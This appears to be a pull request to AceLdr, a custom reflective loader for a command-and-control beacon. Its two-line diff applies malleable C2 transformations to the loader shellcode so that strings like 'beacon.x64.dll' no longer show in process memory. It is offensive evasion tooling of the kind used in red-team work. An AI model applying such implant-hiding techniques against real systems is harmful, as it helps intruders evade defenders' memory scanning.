### PR TITLE
Malleable C2 transformations are now applied to the final AceLdr shellcode

### DIFF
--- a/bin/AceLdr.cna
+++ b/bin/AceLdr.cna
@@ -8,6 +8,6 @@ set BEACON_RDLL_GENERATE {
         return $null;
     };
     warn("Loading custom user defined reflective loader from: " . $smpath);
-
-    return $ldr . $2;
+		
+    return setup_transformations($ldr . $2, $3);
 };


### PR DESCRIPTION
This solves an issue where string references such as "beacon.x64.dll" or "ReflectiveLoader" still existed within the process memory whilst beacon was awake even though the transform section within the malleable profile replaced them.